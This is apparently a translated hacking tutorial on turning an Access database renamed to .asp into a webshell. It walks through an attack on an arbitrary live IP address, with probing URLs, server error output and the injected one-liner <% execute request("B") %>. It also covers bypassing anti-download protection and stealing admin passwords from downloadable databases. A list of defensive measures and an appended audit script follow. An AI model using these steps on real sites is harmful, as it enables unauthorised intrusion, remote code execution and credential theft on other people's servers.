If the database suffix is left unchanged, the file can be downloaded directly with tools such as quickshield. Changing the suffix, however, in fact opens the door for intruders: they can use a database suffixed with ASP/ASA to obtain a webshell directly.
I. Ideas
As we all know, <% %> is the identifier of an ASP file; that is, an ASP file only runs the code between <% and %>. All data in an Access + ASP web system is stored in the database file (MDB file). Because the administrator has changed the MDB file to an ASP file, if the submitted data contains <% %>, the code between <% and %> is executed when we access the ASP database. As a result, we only need to submit malicious code to the database, and the database with the ASP suffix becomes our webshell.
II. Example
Find a target at will. First, let's use the database with the ASP suffix: http://220.170.151.103/test/dlog%5cshowlog.asp?Cat_id=5&log_id=210
Return value:
Microsoft VBScript compiler error code '800a03f6'
'End' missing'
/IISHelp/common/500-100.asp, row 242
Microsoft Jet Database Engine error '20140901'
'D:\log_mdb\%29dlog_mdb%29.asp' is not a valid path. Check whether the path name is correctly spelled and whether it is connected to the server where the file is stored.
/Test/Conn.asp, Row 18
We submit: http://220.170.151.103/test/dlog/log_mdb/%2529dlog_mdb%2529.asp
It returns a bunch of garbled characters, which means the database can be downloaded directly using tools such as Internet Express (which we will not discuss here). On the homepage, we can see that a "user comments" function is provided. We registered a user and sent a comment:
<% execute request("B") %>
In this way, the ASP code <% execute request("B") %> is written to the database, so the database is our webshell. Submit: http://220.170.151.103/test/dlog/log_mdb/%2529dlog_mdb%2529.asp
At the end of the garbled text, we can see:
/IISHelp/common/500-100.asp, line 242
Microsoft VBScript runtime error '800a000d'
Type Mismatch: 'execute'
/Test/dlog/log_mdb/%29dlog_mdb%29.asp, row 1266
Note: When submitting code to the database, the code content cannot be too large. Therefore, we use <% execute request("B") %>.
III. Other questions and ideas
1. Suppose the suffix is changed to ASP and illegal ASP code such as <%='a'-1%> is added to the database to completely prevent the database from being downloaded. Because there is illegal ASP code in the file, inserting our webshell code and running it will only display the error from the earlier illegal code, rather than executing our shell code. Although this can prevent certain attacks, there are still some hidden risks: we only need to add compatible error code before the error code, and the inserted webshell code is displayed correctly.
2. For MDB files whose suffix has not been changed, we can download the database, obtain the background password and enter the background. We can then use the database backup function to change the suffix to ASP.
Summary of MDB anti-download Methods
1. If an extension is not defined under IIS6, a 404 "file not found" error is returned on access.
Therefore, you can give the database a file name that never appears, for example, XXXXX.xxxxxxxxxxx.
2. If you place the database outside the website directory, it can never be accessed over the web. For example, if E:/web/ is your website, put the database in E:/
3. As mentioned above, change .mdb to .asp and add a special table containing the <% binary characters. In this way, anyone accessing the file receives a prompt that the script close character is missing.
4. After changing the MDB to ASP, open it with WinHex. You can find that there is a long run of 00 bytes after 176. You can change it to a piece of ASP code at will to prevent downloading. This does not affect the database function. For example:
<%
Response.Write("illegal access")
Response.End()
%>
Some people add "#" and spaces to the database name. For example, "#" = "<% 35" and the space is "<% 20", so it is useless to use these.
If it is your own server, set it in IIS:
Create a blank DLL file and add a mapping in IIS. Select the DLL file you just created, enter .mdb as the extension, save the setting, and restart the IIS service.
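
To check an existing site against the exposures summarized above, the following added example (not code from the original article) walks a web root, recognizes Access databases by their file header rather than their name, and reports whether each one is downloadable as-is, served under an ASP/ASA suffix, or already contains a <% opener. The function names and issue labels are hypothetical, and the sample files are constructed; the "Standard Jet DB" / "Standard ACE DB" signature at offset 4 is the standard Access header.

```python
import tempfile
from pathlib import Path

JET_MAGICS = (b"Standard Jet DB", b"Standard ACE DB")  # file offset 4 in Access files
SCRIPT_EXTS = {".asp", ".asa"}  # suffixes the article says databases get renamed to
# Assumption: text may be stored single-byte or as UTF-16LE, so look for both forms.
OPENERS = (b"<%", "<%".encode("utf-16-le"))

def is_jet_database(path):
    """Identify an Access database by header, not by file name."""
    with open(path, "rb") as fh:
        header = fh.read(32)
    return any(header[4:4 + len(m)] == m for m in JET_MAGICS)

def has_script_opener(path, chunk_size=1 << 20):
    """True if the raw file contains an ASP '<%' opener anywhere."""
    tail = b""
    with open(path, "rb") as fh:
        while chunk := fh.read(chunk_size):
            data = tail + chunk
            if any(p in data for p in OPENERS):
                return True
            tail = data[-3:]  # overlap so an opener split across chunks is seen
    return False

def audit_webroot(webroot):
    """Return sorted (relative_path, issue) pairs for every database under webroot."""
    findings = []
    for path in Path(webroot).rglob("*"):
        if not path.is_file() or not is_jet_database(path):
            continue
        issue = "db-in-webroot"  # plain database file reachable by URL
        if path.suffix.lower() in SCRIPT_EXTS:  # file is handed to the ASP engine
            issue = "script-block-in-db" if has_script_opener(path) else "db-served-as-script"
        findings.append((path.relative_to(webroot).as_posix(), issue))
    return sorted(findings)

def demo():
    """Audit a constructed web root whose 'databases' are fake Jet headers."""
    jet = b"\x00\x01\x00\x00Standard Jet DB\x00" + b"\x00" * 64
    samples = {"site.mdb": jet, "log.asp": jet + b"<%x%>",
               "clean.asa": jet, "default.asp": b"<%=1%>"}
    with tempfile.TemporaryDirectory() as root:
        for name, body in samples.items():
            Path(root, name).write_bytes(body)
        return audit_webroot(root)

if __name__ == "__main__":
    print(*demo(), sep="\n")
```

Any finding means the database should be moved outside the web root, as in method 2; a "script-block-in-db" result additionally calls for reviewing what user-submitted content reached the database.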